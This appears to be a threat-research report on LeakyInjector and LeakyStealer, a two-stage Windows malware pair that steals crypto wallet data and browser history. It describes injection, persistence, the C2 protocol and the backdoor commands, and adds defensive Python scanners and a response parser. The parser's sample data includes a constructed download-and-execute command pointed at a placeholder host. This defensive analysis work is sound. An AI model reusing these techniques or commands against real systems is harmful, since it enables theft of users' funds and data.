Thursday, November 6, 2025

LeakyInjector and LeakyStealer Duo Hunts For Crypto and Browser History

 Author(s): Vlad Pasca, Radu-Emanuel Chiscariu

  • New two-stage malware targets cryptocurrency wallets and browser history
  • LeakyInjector uses low-level APIs for injection to avoid detection and injects LeakyStealer into explorer.exe
  • LeakyStealer implements a “polymorphic engine” that is able to modify its memory area with hard-coded bytes at runtime
  • Both were signed with a valid Extended Validation certificate
  • LeakyStealer beacons to the C2 server at regular intervals
  • Multiple related samples use the same certificate infrastructure 

Hybrid Analysis has analyzed a new two-stage malware that we’re naming LeakyInjector and LeakyStealer. The duo performs reconnaissance on an infected machine and targets multiple crypto wallets, including browser extensions corresponding to crypto wallets. The malware also looks for browser history files from Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi.

The first stage (LeakyInjector) decrypts the ChaCha20-encrypted second stage (LeakyStealer) and injects the payload into the explorer.exe process. The stealer computes the Bot ID corresponding to the infected machine and establishes persistence using an entry under the Run registry key. The malware implements a polymorphic engine that modifies memory bytes using specific hard-coded values. LeakyStealer searches for crypto wallets such as Electrum, Exodus, Atomic, Sparrow, Ledger Live, Guarda, and BitPay in addition to browser extensions like MetaMask, Phantom, Coinbase, and Trust Wallet. Two backdoor commands are implemented: downloading and executing a file, and executing Windows commands.

A Hybrid Analysis Perspective

The sample is a 64-bit Windows executable (approximately 30 MB, padded with null bytes) and is signed with a valid digital certificate. The malware contains numerous debug strings and artifacts, indicating minimal obfuscation.

Figure 1 - File Summary

The malware establishes persistence by creating an entry under the Run registry key:

Figure 2 - Persistence through registry manipulation

Looking at the “HTTP Traffic” in the Hybrid Analysis report, we can identify HTTP POST requests used for C2 communications. The domain was recently registered. The process connects to 45[.]151[.]62[.]120 on port 443 (TCP), using a browser-related user agent.

Figure 3 - HTTP POST requests to the C2 server

The stealer is looking for different browser extensions corresponding to crypto wallets:

Figure 4 - Crypto wallets are targeted

The malware reads browser-related files to retrieve the browser history, as highlighted in the figure below.

Figure 5 - Accessing browser-related data

A Deeper Dive

LeakyInjector analysis

The first stage - which we named LeakyInjector - is looking for the “explorer.exe” process on the host:

Figure 6 - The injector searches for the explorer.exe process

The malware injects the next stage into the explorer process using the low level APIs displayed below.

Figure 7 - Perform process injection using low level APIs

The stealer that we called LeakyStealer is stored in an encrypted form in the injector and is decrypted using the ChaCha20 algorithm, with the key and nonce being hard-coded.

Figure 8 - ChaCha20 algorithm is used to decrypt the stealer before it is injected

LeakyStealer analysis

The malware computes the Bot ID of the infected host by XOR-ing the “C:\” volume serial number with the 0xDEADBEEF constant. If the serial number is not available, the Bot ID is initialized using the GetTickCount function.

Figure 9 - Bot ID value is computed

It retrieves the hostname, the username, and the domain assigned to the local machine (see Figure 10).

Figure 10 - Extract information that will be exfiltrated

The malicious process determines whether it’s running with admin privileges using the GetTokenInformation API (0x14 = TokenElevation):

Figure 11 - Determine if the malware is running with admin privileges

The binary connects to the everstead[.]group C2 server using a hard-coded user agent, as highlighted below.

Figure 12 - First connection to the C2 server

A field called “Traffic Tag” is initialized with the “convert” value. Figure 13 reveals the verbose output containing information extracted in previous steps.

Figure 13 - Multiple debugging strings shown

Persistence

The stealer copies itself as “MicrosoftEdgeUpdateCore.exe” in the “%AppData%” directory. It establishes persistence by creating an entry called “EdgeUpdateCore” under the Run registry key:

Figure 14 - Self-copy and persistence

LeakyStealer implements a “polymorphic engine” that is able to modify its memory area with hard-coded bytes at runtime:

Figure 15 - Modify bytes using a routine called polymorphic engine at runtime

The search is performed for the 8-byte marker “DE AD BE EF CA FE BA BE”. The process changes the memory protection of the first 16 bytes (including the marker) using VirtualProtect (0x40 = PAGE_EXECUTE_READWRITE). These 16 bytes are modified to a randomized sequence of “no-operation” assembly instructions, such as 0x90 for NOP, “EB 00” for JMP 0x2, or “66 90” for “XCHG AX, AX”. The code that performs the patching is fairly common and frequently found in video game cheat engines. Its purpose in this sample remains unclear as it does not change any actual code and limits the patching to the marker bytes.

Figure 16 - Replace the 16 bytes containing the hard-coded marker using different bytes
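As an added example (not code from the report), the following Python helpers scan a file or memory image for the intact marker and for 16-byte windows made only of the NOP-equivalent encodings listed above, which is how the region looks after the engine has run. The marker, patch length and the three instruction encodings come from the report; the sample buffers are constructed here, and the “at least two different forms” heuristic for ignoring ordinary compiler padding is this example’s own.

```python
# Constants from the report; everything else in this block is an added example.
MARKER = bytes.fromhex("DEADBEEFCAFEBABE")      # 8-byte marker the engine searches for
PATCH_LEN = 16                                   # bytes re-protected (0x40) and overwritten
# NOP-equivalent encodings the engine writes: NOP, JMP +0 (EB 00), XCHG AX,AX (66 90)
NOP_FORMS = (b"\x90", b"\xEB\x00", b"\x66\x90")

def find_marker(data: bytes) -> list:
    """Offsets of the intact marker (on-disk sample or pre-patch memory image)."""
    hits, pos = [], data.find(MARKER)
    while pos != -1:
        hits.append(pos)
        pos = data.find(MARKER, pos + 1)
    return hits

def nop_tokens(chunk: bytes):
    """Split chunk into NOP forms, or return None if any byte is not part of one.
    The forms start with distinct bytes (90/EB/66), so the split is unambiguous;
    a two-byte form cut off at the end of the chunk makes the chunk NOT filler."""
    tokens, i = [], 0
    while i < len(chunk):
        for form in NOP_FORMS:
            if chunk.startswith(form, i):
                tokens.append(form)
                i += len(form)
                break
        else:
            return None
    return tokens

def find_patched_regions(data: bytes) -> list:
    """Offsets of 16-byte windows consisting only of NOP forms (post-patch image).
    Heuristic (this example's own): windows built from a single form are skipped,
    since runs of plain 0x90 or 66 90 are normal compiler alignment padding."""
    hits, off = [], 0
    while off <= len(data) - PATCH_LEN:
        tokens = nop_tokens(data[off:off + PATCH_LEN])
        if tokens and len(set(tokens)) >= 2:
            hits.append(off)
            off += PATCH_LEN          # do not re-report overlapping windows
        else:
            off += 1
    return hits

# Constructed sample: a few code bytes, the marker plus its 8 trailing bytes, a RET.
PRE_PATCH = b"\x48\x89\x5c\x24\x08" + MARKER + b"\x11\x22\x33\x44\x55\x66\x77\x88" + b"\xc3"
# The same region after the engine replaced all 16 bytes with mixed NOP forms.
POST_PATCH = (b"\x48\x89\x5c\x24\x08"
              + b"\x90\xEB\x00\x66\x90\x90\x90\xEB\x00\x66\x90\x90\xEB\x00\x90\x90"
              + b"\xc3")
```

Run both scanners over a dump taken before and after the routine executes: the marker disappears while a mixed NOP window appears at the same offset.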

The binary enters a loop that builds a registration packet that will be sent to the C2 server (Figure 17).

Figure 17 - LeakyStealer is beaconing to the C2 server at regular intervals

The RtlGetVersion and GetVersionExA methods are utilized to obtain the Windows version:

Figure 18 - Retrieve the Windows OS version

Data exfiltration

The registration packet contains the “LOAD” magic string, the Bot ID, 0x01 (value corresponding to a Registration packet), the admin flag, the traffic tag, the hostname, the username, the Windows domain, and the OS version:

Figure 19 - Registration packet is constructed

Figure 20 - Example of a registration packet

LeakyStealer is looking for cryptocurrency wallets such as Electrum, Exodus, Atomic, Sparrow, Ledger Live, Guarda, and BitPay:

Figure 21 - Multiple crypto wallets are targeted

Cryptocurrency browser extensions such as MetaMask, Phantom Wallet, Coinbase Wallet, and Trust Wallet are also targeted:

Figure 22 - Crypto browser extensions

The malware exfiltrates the registration packet to the “/api/beacon” URI. The server’s response is received and read using the WinHttpReceiveResponse and WinHttpReadData functions (Figure 23).

Figure 23 - Server’s response is received and parsed

The binary extracts the history file from the following browsers: Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi.

Figure 24 - Obtain the history file from multiple browsers

Every history file found is copied to the temporary folder as “history_%d.db”, where “%d” is generated via a function call to GetTickCount. The malware reads these files in memory and deletes them afterward using the DeleteFileA API, as highlighted below.

Figure 25 - Create copies of history files, read them, and then delete them afterwards

The browser history is exfiltrated to the C2 server using the “/api/beacon/history” URI. We observe that the stealer adds the “X-Bot-Id” header in the request:

Figure 26 - Browser history files are sent to the C2 server

Figure 27 - Example of exfiltrating the browsing history files

The server’s response has the following structure: “LOAD<1-byte Command type><4-byte Command length><Command>”. The command type can be 0 (no command from the server), 1 (one of the two commands implemented by the stealer), or >=2 (unknown command type).

Figure 28 - Specific packet structure is expected from the C2 server

Stealer Commands

The first command is used to download and execute a file from the C2 server. It has the “download URL Localfile” structure.

Figure 29 - Download command implemented by LeakyStealer

As we can see below, the process downloads the file from the C2 server, creates the local file and writes the downloaded content to it, and finally executes it using the CreateProcessA method.

Figure 30 - Create new file mentioned in the command

Figure 31 - CreateProcessA API call

The second command runs Windows commands on the infected machine and sends the output to the C2 server. The output is read using an anonymous pipe:

Figure 32 - Execute Windows command on the infected host
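As an added example (not the report’s code), here is a Python parser for the response layout in Figure 28 that also splits a type-1 command into the two operations described in this section. The report does not state the byte order of the 4-byte length field or how the stealer tells the two type-1 commands apart; this example assumes little-endian and a leading “download” keyword (from the “download URL Localfile” structure), and the sample responses, URL and path are constructed.

```python
import struct

MAGIC = b"LOAD"                  # magic string from the report
HEADER = struct.Struct("<BI")    # 1-byte command type, 4-byte length (little-endian assumed)
CMD_NONE, CMD_EXEC = 0, 1        # 0 = no command, 1 = one of the two implemented commands

def parse_c2_response(blob: bytes) -> dict:
    """Decode one server response captured from the /api/beacon exchange.
    Raises ValueError on anything that does not match the expected layout,
    so a malformed capture is distinguishable from an 'unknown command'."""
    if len(blob) < len(MAGIC) + HEADER.size:
        raise ValueError("truncated header")
    if blob[:len(MAGIC)] != MAGIC:
        raise ValueError("bad magic %r" % blob[:len(MAGIC)])
    cmd_type, cmd_len = HEADER.unpack_from(blob, len(MAGIC))
    start = len(MAGIC) + HEADER.size
    body = blob[start:start + cmd_len]
    if len(body) != cmd_len:
        raise ValueError("declared %d command bytes, got %d" % (cmd_len, len(body)))
    if cmd_type == CMD_NONE:
        return {"type": cmd_type, "action": "none"}
    if cmd_type != CMD_EXEC:
        return {"type": cmd_type, "action": "unknown", "raw": body}
    text = body.decode("utf-8", errors="replace")
    parts = text.split(" ", 2)
    # Assumption: the download command is recognised by its leading keyword;
    # everything else of type 1 is treated as a Windows command to execute.
    if parts[0].lower() == "download" and len(parts) == 3:
        return {"type": cmd_type, "action": "download",
                "url": parts[1], "local_file": parts[2]}
    return {"type": cmd_type, "action": "shell", "command": text}

def build_c2_response(cmd_type: int, command: bytes = b"") -> bytes:
    """Encode a response in the same layout (used here only to construct samples)."""
    return MAGIC + HEADER.pack(cmd_type, len(command)) + command

# Constructed samples; the URL and path are placeholders, not indicators from the report.
SAMPLE_NONE = build_c2_response(CMD_NONE)
SAMPLE_DOWNLOAD = build_c2_response(
    CMD_EXEC, b"download http://c2.invalid/upd.bin C:\\Users\\Public\\upd.exe")
SAMPLE_SHELL = build_c2_response(CMD_EXEC, b"hostname")
SAMPLE_UNKNOWN = build_c2_response(7, b"\x00\x01")
```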

Mapping the infrastructure

The certificate’s issuer details point to a Hong Kong registrant. Similar versions of the stealer were signed with the same certificate. At the time of the analysis, the certificate was still valid, but by the time of publishing this report it had been revoked by its issuer.

Figure 33 - Signed Certificate information

The certificate thumbprint A8BF7554363D27DEB374C4E2658AC05C60E3BAA7 revealed seven related samples, demonstrating that the threat actor reuses signing infrastructure across multiple payloads.


Signer: Hefei Nudan Jukuang Network Technology Co., Ltd.
Valid Period: September 9, 2025 - September 9, 2026
Issuer: Sectigo Public Code Signing CA EV R36

This legitimate Extended Validation (EV) certificate may have been obtained through fraudulent means, or a compromised business entity may have been abused for malware signing. The seven samples share consistent operational patterns:
  • Persistence mechanisms across all variants
  • Masquerading as legitimate Microsoft Edge update components
  • Recent activity with samples spanning October 1-9, 2025

A Shodan search for the IP address returns open ports 22, 80 and 443.

Figure 34 - Shodan search

There are two domains associated with the IP address, namely “everstead[.]group” and “ip-ptr[.]tech”.  

Figure 35 - Shodan result for the IP address

The MSI file called “dynatrc.php” drops a LeakyStealer sample (SHA256 dea8653698cea84e063165524c3e8c8141de246a29b9b8de40be3943fd1c6f14) that communicates with the same C2 server. The installer could be downloaded from the paycnex[.]com domain, as highlighted below:

Figure 36 - VirusTotal result shows the distribution site of the installer

We’ve identified a PowerShell script that is related to NetSupportRAT on the same domain:

Figure 37 - PowerShell script related to NetSupportRAT was stored on the distribution domain

LeakyStealer Through the Eyes of Hybrid Analysis

The Hybrid Analysis report identifies multiple behavioral patterns and indicators that classify LeakyStealer as a new, information-stealing malware. For example, it highlights that the process targets crypto browser extensions and the history files across multiple browsers. Through in-depth technical analysis of LeakyStealer’s core functionality, we aim to offer insights that enable more effective detection and defense strategies.

Hybrid Analysis is a powerful platform for identifying and analyzing malware, whether mundane or highly sophisticated. It provides detailed context and information that can be investigated further during the dynamic analysis of the malware. For performing a more in-depth analysis of malware samples, you can download them by registering with a Hybrid Analysis account and becoming a vetted user.

Indicators of Compromise


SHA256

Files created
%AppData%\MicrosoftEdgeUpdateCore.exe
C:\Users\<User>\AppData\Local\Temp\history_%d.db

Registry value
EdgeUpdateCore

C2 server
everstead[.]group